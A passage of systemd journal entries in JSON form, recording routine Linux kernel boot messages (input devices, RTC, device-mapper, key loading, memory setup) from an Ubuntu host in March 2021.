"_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1109449", "MESSAGE" : "mousedev: PS/2 mouse device common for all mice" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17e;b=e2b08827b5804427b422c10c84f1567e;m=572844;t=5bd16dd1aa7ac;x=50d9fe56fe48eab5", "__REALTIME_TIMESTAMP" : "1615280779995052", "__MONOTONIC_TIMESTAMP" : "5711940", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1112923", "MESSAGE" : "input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17f;b=e2b08827b5804427b422c10c84f1567e;m=573263;t=5bd16dd1ab1cb;x=68a985843a955b82", "__REALTIME_TIMESTAMP" : "1615280779997643", "__MONOTONIC_TIMESTAMP" : "5714531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1117456", "MESSAGE" : "rtc_cmos 00:00: RTC can wake from S4" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=180;b=e2b08827b5804427b422c10c84f1567e;m=573302;t=5bd16dd1ab26a;x=c6cc0e35801d1ce9", "__REALTIME_TIMESTAMP" : "1615280779997802", "__MONOTONIC_TIMESTAMP" : "5714690", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1120562", "MESSAGE" : "rtc_cmos 00:00: rtc core: registered rtc_cmos as rtc0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=181;b=e2b08827b5804427b422c10c84f1567e;m=573384;t=5bd16dd1ab2eb;x=c4d65f02f5e85074", "__REALTIME_TIMESTAMP" : "1615280779997931", "__MONOTONIC_TIMESTAMP" : "5714820", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1123947", "MESSAGE" : "rtc_cmos 00:00: alarms up to one day, y3k, 114 bytes nvram" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=182;b=e2b08827b5804427b422c10c84f1567e;m=573392;t=5bd16dd1ab2fa;x=2e98378bbae74b79", "__REALTIME_TIMESTAMP" : "1615280779997946", "__MONOTONIC_TIMESTAMP" : "5714834", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1127232", "MESSAGE" : "i2c /dev entries driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=183;b=e2b08827b5804427b422c10c84f1567e;m=57339e;t=5bd16dd1ab306;x=b16628e86e165900", "__REALTIME_TIMESTAMP" : "1615280779997958", "__MONOTONIC_TIMESTAMP" : "5714846", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1129173", "MESSAGE" : "device-mapper: uevent: version 1.0.3" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=184;b=e2b08827b5804427b422c10c84f1567e;m=5733aa;t=5bd16dd1ab312;x=58fad9fec424c6a4", "__REALTIME_TIMESTAMP" : "1615280779997970", "__MONOTONIC_TIMESTAMP" : "5714858", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1131565", "MESSAGE" : "device-mapper: ioctl: 4.37.0-ioctl (2017-09-20) initialised: dm-devel@redhat.com" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=185;b=e2b08827b5804427b422c10c84f1567e;m=5733b5;t=5bd16dd1ab31d;x=c07c443d3e16db99", "__REALTIME_TIMESTAMP" : "1615280779997981", "__MONOTONIC_TIMESTAMP" : "5714869", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1135720", "MESSAGE" : "ledtrig-cpu: registered to indicate activity on CPUs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=186;b=e2b08827b5804427b422c10c84f1567e;m=5733c0;t=5bd16dd1ab328;x=6a7777c70ce3a255", "__REALTIME_TIMESTAMP" : "1615280779997992", "__MONOTONIC_TIMESTAMP" : "5714880", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1138945", "MESSAGE" : "NET: Registered protocol family 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=187;b=e2b08827b5804427b422c10c84f1567e;m=5733cb;t=5bd16dd1ab333;x=4be3aaf7e9240aee", "__REALTIME_TIMESTAMP" : "1615280779998003", "__MONOTONIC_TIMESTAMP" : "5714891", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1145234", "MESSAGE" : "Segment Routing with IPv6" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=188;b=e2b08827b5804427b422c10c84f1567e;m=5733d6;t=5bd16dd1ab33e;x=4640c378a5cdf6da", "__REALTIME_TIMESTAMP" : "1615280779998014", "__MONOTONIC_TIMESTAMP" : "5714902", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1147095", "MESSAGE" : "NET: Registered protocol family 17" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=189;b=e2b08827b5804427b422c10c84f1567e;m=5733e1;t=5bd16dd1ab349;x=767dc5bae120251e", "__REALTIME_TIMESTAMP" : "1615280779998025", "__MONOTONIC_TIMESTAMP" : "5714913", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1149474", "MESSAGE" : "Key type dns_resolver registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18a;b=e2b08827b5804427b422c10c84f1567e;m=5733f1;t=5bd16dd1ab358;x=dc645808a879f3b", "__REALTIME_TIMESTAMP" : "1615280779998040", "__MONOTONIC_TIMESTAMP" : "5714929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1152099", "MESSAGE" : "mce: Using 10 MCE banks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18b;b=e2b08827b5804427b422c10c84f1567e;m=5733fc;t=5bd16dd1ab364;x=548f413767b00380", "__REALTIME_TIMESTAMP" : "1615280779998052", "__MONOTONIC_TIMESTAMP" : "5714940", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1154159", "MESSAGE" : "RAS: Correctable Errors collector initialized." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18c;b=e2b08827b5804427b422c10c84f1567e;m=573407;t=5bd16dd1ab36f;x=373f9d3379613ea0", "__REALTIME_TIMESTAMP" : "1615280779998063", "__MONOTONIC_TIMESTAMP" : "5714951", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1157286", "MESSAGE" : "sched_clock: Marking stable (1157251439, 0)->(1571788225, -414536786)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18d;b=e2b08827b5804427b422c10c84f1567e;m=573412;t=5bd16dd1ab37a;x=8c48752968bc386e", "__REALTIME_TIMESTAMP" : "1615280779998074", "__MONOTONIC_TIMESTAMP" : "5714962", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1161722", "MESSAGE" : "registered taskstats version 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18e;b=e2b08827b5804427b422c10c84f1567e;m=57341d;t=5bd16dd1ab385;x=20a0aa6d8fdeab14", "__REALTIME_TIMESTAMP" : "1615280779998085", "__MONOTONIC_TIMESTAMP" : "5714973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1163542", "MESSAGE" : "Loading compiled-in X.509 certificates" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18f;b=e2b08827b5804427b422c10c84f1567e;m=573429;t=5bd16dd1ab390;x=364a7ceb72127fa7", "__REALTIME_TIMESTAMP" : "1615280779998096", "__MONOTONIC_TIMESTAMP" : "5714985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1167803", "MESSAGE" : "Loaded X.509 cert 'Build time autogenerated kernel key: 9d88e3c0462fa0d2df2917e8bbfdfdd1c55d8ddc'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=190;b=e2b08827b5804427b422c10c84f1567e;m=573433;t=5bd16dd1ab39b;x=a7649390f19a2916", "__REALTIME_TIMESTAMP" : "1615280779998107", "__MONOTONIC_TIMESTAMP" : "5714995", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1171911", "MESSAGE" : "zswap: loaded using pool lzo/zbud" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=191;b=e2b08827b5804427b422c10c84f1567e;m=57343e;t=5bd16dd1ab3a6;x=14cb07770d36fce", "__REALTIME_TIMESTAMP" : "1615280779998118", "__MONOTONIC_TIMESTAMP" : "5715006", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1179054", "MESSAGE" : "Key type big_key registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=192;b=e2b08827b5804427b422c10c84f1567e;m=573449;t=5bd16dd1ab3b1;x=84725ba8ef890781", "__REALTIME_TIMESTAMP" : "1615280779998129", "__MONOTONIC_TIMESTAMP" : "5715017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1181159", "MESSAGE" : "Key type trusted registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=193;b=e2b08827b5804427b422c10c84f1567e;m=573457;t=5bd16dd1ab3be;x=8c35f3d6f37cf7a", "__REALTIME_TIMESTAMP" : "1615280779998142", "__MONOTONIC_TIMESTAMP" : "5715031", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1184702", "MESSAGE" : "Key type encrypted registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=194;b=e2b08827b5804427b422c10c84f1567e;m=573462;t=5bd16dd1ab3ca;x=c87a6c56a1a279ae", "__REALTIME_TIMESTAMP" : "1615280779998154", "__MONOTONIC_TIMESTAMP" : "5715042", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1186983", "MESSAGE" : "AppArmor: AppArmor sha1 policy hashing enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=195;b=e2b08827b5804427b422c10c84f1567e;m=57346d;t=5bd16dd1ab3d5;x=c957789a9634f928", "__REALTIME_TIMESTAMP" : "1615280779998165", "__MONOTONIC_TIMESTAMP" : "5715053", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1190009", "MESSAGE" : "ima: No TPM chip found, activating TPM-bypass! (rc=-19)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=196;b=e2b08827b5804427b422c10c84f1567e;m=573478;t=5bd16dd1ab3e0;x=adfc620004c800d3", "__REALTIME_TIMESTAMP" : "1615280779998176", "__MONOTONIC_TIMESTAMP" : "5715064", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1193151", "MESSAGE" : "ima: Allocated hash algorithm: sha1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=197;b=e2b08827b5804427b422c10c84f1567e;m=573483;t=5bd16dd1ab3eb;x=693f53aec40a6152", "__REALTIME_TIMESTAMP" : "1615280779998187", "__MONOTONIC_TIMESTAMP" : "5715075", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1195370", "MESSAGE" : "evm: HMAC attrs: 0x1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=198;b=e2b08827b5804427b422c10c84f1567e;m=57348e;t=5bd16dd1ab3f6;x=ab505d66e5946eb3", "__REALTIME_TIMESTAMP" : "1615280779998198", "__MONOTONIC_TIMESTAMP" : "5715086", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1212166", "MESSAGE" : " Magic number: 13:673:120" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=199;b=e2b08827b5804427b422c10c84f1567e;m=573546;t=5bd16dd1ab4ae;x=33380f962a41035e", "__REALTIME_TIMESTAMP" : "1615280779998382", "__MONOTONIC_TIMESTAMP" : "5715270", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "misc", "_KERNEL_DEVICE" : "c10:236", "_UDEV_DEVNODE" : "/dev/mapper/control", "_UDEV_SYSNAME" : "device-mapper", "_SOURCE_MONOTONIC_TIMESTAMP" : "1214311", "MESSAGE" : "misc device-mapper: hash matches" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19a;b=e2b08827b5804427b422c10c84f1567e;m=5735e0;t=5bd16dd1ab547;x=6ddee31668d859d8", "__REALTIME_TIMESTAMP" : "1615280779998535", "__MONOTONIC_TIMESTAMP" : "5715424", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1216895", "MESSAGE" : "rtc_cmos 00:00: setting system clock to 2021-03-09 09:06:15 UTC (1615280775)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19b;b=e2b08827b5804427b422c10c84f1567e;m=5735f4;t=5bd16dd1ab55c;x=4565413a50e75f50", "__REALTIME_TIMESTAMP" : "1615280779998556", "__MONOTONIC_TIMESTAMP" : "5715444", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1221337", "MESSAGE" : "BIOS EDD facility v0.16 2004-Jun-25, 0 devices found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19c;b=e2b08827b5804427b422c10c84f1567e;m=573601;t=5bd16dd1ab569;x=f4f41e03b396a3ad", "__REALTIME_TIMESTAMP" : "1615280779998569", "__MONOTONIC_TIMESTAMP" : "5715457", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1224355", "MESSAGE" : "EDD information not available." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19d;b=e2b08827b5804427b422c10c84f1567e;m=57360e;t=5bd16dd1ab575;x=329d3d8c40cf755c", "__REALTIME_TIMESTAMP" : "1615280779998581", "__MONOTONIC_TIMESTAMP" : "5715470", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1229389", "MESSAGE" : "Freeing unused kernel image memory: 2436K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19e;b=e2b08827b5804427b422c10c84f1567e;m=57361a;t=5bd16dd1ab581;x=e986ddf95cc1e0d4", "__REALTIME_TIMESTAMP" : "1615280779998593", "__MONOTONIC_TIMESTAMP" : "5715482", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1236019", "MESSAGE" : "Write protecting the kernel read-only data: 20480k" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19f;b=e2b08827b5804427b422c10c84f1567e;m=573628;t=5bd16dd1ab58f;x=a7162108f59cf17e", "__REALTIME_TIMESTAMP" : "1615280779998607", "__MONOTONIC_TIMESTAMP" : "5715496", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1240612", "MESSAGE" : "Freeing unused kernel image memory: 2008K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a0;b=e2b08827b5804427b422c10c84f1567e;m=57363e;t=5bd16dd1ab5a5;x=2e6670b63c08b1f0", "__REALTIME_TIMESTAMP" : "1615280779998629", "__MONOTONIC_TIMESTAMP" : "5715518", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1243751", "MESSAGE" : "Freeing unused kernel image memory: 1972K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a1;b=e2b08827b5804427b422c10c84f1567e;m=573652;t=5bd16dd1ab5ba;x=dc19fed6f929eec8", "__REALTIME_TIMESTAMP" : "1615280779998650", "__MONOTONIC_TIMESTAMP" : "5715538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1254068", "MESSAGE" : "x86/mm: Checked W+X mappings: passed, no W+X pages found." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a2;b=e2b08827b5804427b422c10c84f1567e;m=57366f;t=5bd16dd1ab5d6;x=6c443cca0ce6637f", "__REALTIME_TIMESTAMP" : "1615280779998678", "__MONOTONIC_TIMESTAMP" : "5715567", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1257536", "MESSAGE" : "x86/mm: Checking user space page tables" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a3;b=e2b08827b5804427b422c10c84f1567e;m=57368a;t=5bd16dd1ab5f1;x=a5a65394811d4696", "__REALTIME_TIMESTAMP" : "1615280779998705", "__MONOTONIC_TIMESTAMP" : "5715594", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/mm: Checked W+X mappings: passed, no W+X pages found.", "_SOURCE_MONOTONIC_TIMESTAMP" : "1267705" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a4;b=e2b08827b5804427b422c10c84f1567e;m=573696;t=5bd16dd1ab5fd;x=b489bb420b8ec40e", "__REALTIME_TIMESTAMP" : "1615280779998717", "__MONOTONIC_TIMESTAMP" : "5715606", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1405178", "MESSAGE" : "FDC 0 is a S82078B" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a5;b=e2b08827b5804427b422c10c84f1567e;m=5736a5;t=5bd16dd1ab60c;x=817de7ebebd1e132", "__REALTIME_TIMESTAMP" : "1615280779998732", "__MONOTONIC_TIMESTAMP" : "5715621", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", 